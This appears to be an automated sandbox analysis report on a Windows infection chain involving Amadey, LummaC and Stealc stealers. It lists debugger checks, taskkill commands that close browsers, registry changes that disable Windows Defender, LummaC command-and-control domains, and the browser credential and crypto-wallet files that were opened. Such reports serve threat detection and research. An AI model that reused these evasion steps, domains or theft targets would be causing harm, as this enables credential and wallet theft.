Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Code function: 2_2_003265B9 rdtsc 2_2_003265B9
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Code function: 2_2_0019B7C6 LdrInitializeThunk, 2_2_0019B7C6
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 1171a5b648.exe PID: 2032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6072, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 1171a5b648.exe PID: 2148, type: MEMORYSTR
LummaC encrypted strings found
Source: file.exe, 00000000.00000003.1653925235.0000000004F20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000003.1653925235.0000000004F20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000003.1653925235.0000000004F20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000003.1653925235.0000000004F20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000003.1653925235.0000000004F20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000003.1653925235.0000000004F20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000003.1653925235.0000000004F20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000003.1653925235.0000000004F20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: presticitpo.store
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe "C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe "C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe "C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002779001\num.exe "C:\Users\user\AppData\Local\Temp\1002779001\num.exe" Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: 275df0ca27.exe, 0000000C.00000002.2617209511.0000000000AF2000.00000002.00000001.01000000.00000010.sdmp, 275df0ca27.exe, 00000021.00000000.2706701885.0000000000AF2000.00000002.00000001.01000000.00000010.sdmp, 275df0ca27.exe.8.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: firefox.exe, 0000001B.00000002.2723552985.0000000A4CC8B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: skotes.exe, skotes.exe, 00000007.00000002.1951021674.000000000065E000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: PsProgram Manager
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe, QPHIWB3GKESEWV8SSDAQV1GC2I70.exe, 00000002.00000002.1999899789.000000000036D000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: hProgram Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002779001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002779001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Registry value created: TamperProtection 0 Jump to behavior
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
AV process strings found (often used to terminate AV products)
Source: file.exe, 00000000.00000003.1742914022.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2537112071.0000000005271000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2556881049.0000000005277000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2557871545.0000000005279000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2717293558.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2698690001.00000000010D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 3.2.EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.460000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.skotes.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.skotes.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.1946832633.0000000000471000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1919373929.0000000000461000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1950487972.0000000000471000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2318263241.00000000048E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1908505186.0000000004830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1906133835.0000000005240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.1878822213.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: 0000000C.00000003.2607023655.0000000000C3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 275df0ca27.exe PID: 2312, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: 6cadd3f0fd.exe PID: 7516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6cadd3f0fd.exe PID: 6292, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: file.exe PID: 7492, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 28.2.num.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.1171a5b648.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.num.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.1171a5b648.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2529289944.00000000000F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2692045054.000000000117B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2604298529.0000000000E9E000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2531875867.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.2588138718.0000000000E9E000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2611179744.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2488093515.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2604161455.0000000000E81000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.2588009468.0000000000E81000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.2632031246.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2685024844.00000000000F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1171a5b648.exe PID: 2032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6072, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 1171a5b648.exe PID: 2148, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000003.1710352481.00000000011DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":2097
Source: file.exe, 00000000.00000003.1710352481.00000000011DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: t":0,"p":"%appdata%\\ElectronCash\\wallets","m":
Source: file.exe String found in binary or memory: Jaxx Liberty
Source: 6cadd3f0fd.exe, 0000000D.00000003.2629694606.00000000010C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: 6cadd3f0fd.exe, 0000000D.00000003.2585953036.00000000010C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus",
Source: file.exe String found in binary or memory: Wallets/Exodus
Source: file.exe, 00000000.00000003.1710352481.00000000011DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: a%\\Ethereum","m":["keystore"],"z":"Wallets/Ethe
Source: file.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe String found in binary or memory: keystore
Source: 6cadd3f0fd.exe, 0000000D.00000003.2585953036.00000000010C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
